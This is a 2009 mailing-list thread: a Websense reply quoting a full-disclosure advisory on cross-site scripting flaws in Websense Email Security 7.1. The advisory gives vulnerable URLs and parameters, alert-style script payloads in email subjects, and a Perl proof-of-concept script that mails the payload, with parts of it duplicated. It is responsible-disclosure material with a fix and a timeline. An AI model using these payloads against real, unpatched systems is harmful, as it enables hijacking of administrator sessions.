The vulnerability has been fixed within the latest version which is 7.2. This is set to be released Friday, October 23, 2009.
Websense would like to thank Nikolas for working with us on the issue.
Websense customers can get the new version for free through mywebsense.com and details on the security fix are in the release notes and within our Knowledge Base.
Thanks
-----Original Message-----
From: full-disclosure-bounces (at) lists.grok.org (dot) uk [email concealed] [mailto:full-disclosure-bounces (at) lists.grok.org (dot) uk [email concealed]] On Behalf Of NSO Research
Sent: Tuesday, October 20, 2009 12:10 PM
To: full-disclosure (at) lists.grok.org (dot) uk [email concealed]; bugtraq (at) securityfocus (dot) com [email concealed]
Subject: [Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
Title: Websense Email Security Cross Site Scripting
Severity: Low
Advisory ID: NSOADV-2009-003
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-003.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
============
1. XSS in webfrontend:
----------------------
The webfrontend do not properly sanitize some variables before being
returned to the user.
my $from_address = '<xss (at) mail (dot) com [email concealed]>';
my $to_address = "<" . $rcpt . ">";
my $mail_host = $server;
my $subject = 'VIAGRA XSS File "><BODY ONLOAD=alert(\'XSS\')>';
my $message_body = "XSS Test File";
$msg = MIME::Lite->new (
From => $from_address,
To => $to_address,
Subject => $subject,
Type =>'multipart/mixed'
) or die "Error creating multipart container: $!\n";
$msg->attach (
Type => 'TEXT',
Data => $message_body
) or die "Error adding the text message part: $!\n";
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The path will be available in Version 7.2
which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Protected by Websense Hosted Email Security -- www.websense.com
Websense would like to thank Nikolas for working with us on the issue.
Websense customers can get the new version for free through mywebsense.com and details on the security fix are in the release notes and within our Knowledge Base.
Thanks
-----Original Message-----
From: full-disclosure-bounces (at) lists.grok.org (dot) uk [email concealed] [mailto:full-disclosure-bounces (at) lists.grok.org (dot) uk [email concealed]] On Behalf Of NSO Research
Sent: Tuesday, October 20, 2009 12:10 PM
To: full-disclosure (at) lists.grok.org (dot) uk [email concealed]; bugtraq (at) securityfocus (dot) com [email concealed]
Subject: [Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
_________________________________________
Security Advisory NSOADV-2009-003
_________________________________________
_________________________________________
Title: Websense Email Security Cross Site Scripting
Severity: Low
Advisory ID: NSOADV-2009-003
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-003.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===========
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
============
1. XSS in webfrontend:
----------------------
The webfrontend do not properly sanitize some variables before being
returned to the user.
http://<target>:8181/web/msgList/viewmsg/actions/msgAnalyse.asp ?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] &ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]
http://<target>:8181/web/msgList/viewmsg/actions/msgForwardToRis kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]& ServerName=[XSS]
http://<target>:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= [XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of the Web Administrator frontend.
2. XSS in webfrontend through a Mail Subject:
---------------------------------------------
The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before shown in the Web Administrator
frontend.
Script code like "><script>alert('X')</script> will be executed in
the users's browser in context of the Web Administrator frontend.
The Mail has to be hold in a Queue to execute the code if the
administrator checks it. A Subject like
VIAGRA"><script>alert('XSS')</script>
will result in a hold in the Anti Spam Queue.
Proof of Concept :
==================
#!/usr/bin/perl
use MIME::Lite;
use Net::SMTP;
(($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0",
"<server> <Recipient> \n";
my $from_address = '<xss (at) mail (dot) com [email concealed]>';
my $to_address = "<" . $rcpt . ">";
my $mail_host = $server;
my $subject = 'VIAGRA XSS File "><BODY ONLOAD=alert(\'XSS\')>';
my $message_body = "XSS Test File";
$msg = MIME::Lite->new (
From => $from_address,
To => $to_address,
Subject => $subject,
Type =>'multipart/mixed'
) or die "Error creating multipart container: $!\n";
$msg->attach (
Type => 'TEXT',
Data => $message_body
) or die "Error adding the text message part: $!\n";
MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;
Solution:
=========
Vendor released a patch.
http://tinyurl.com/yhe3hqa
Disclosure Timeline (YYYY/MM/DD):
=================================
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The path will be available in Version 7.2
which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Protected by Websense Hosted Email Security -- www.websense.com
[ reply ]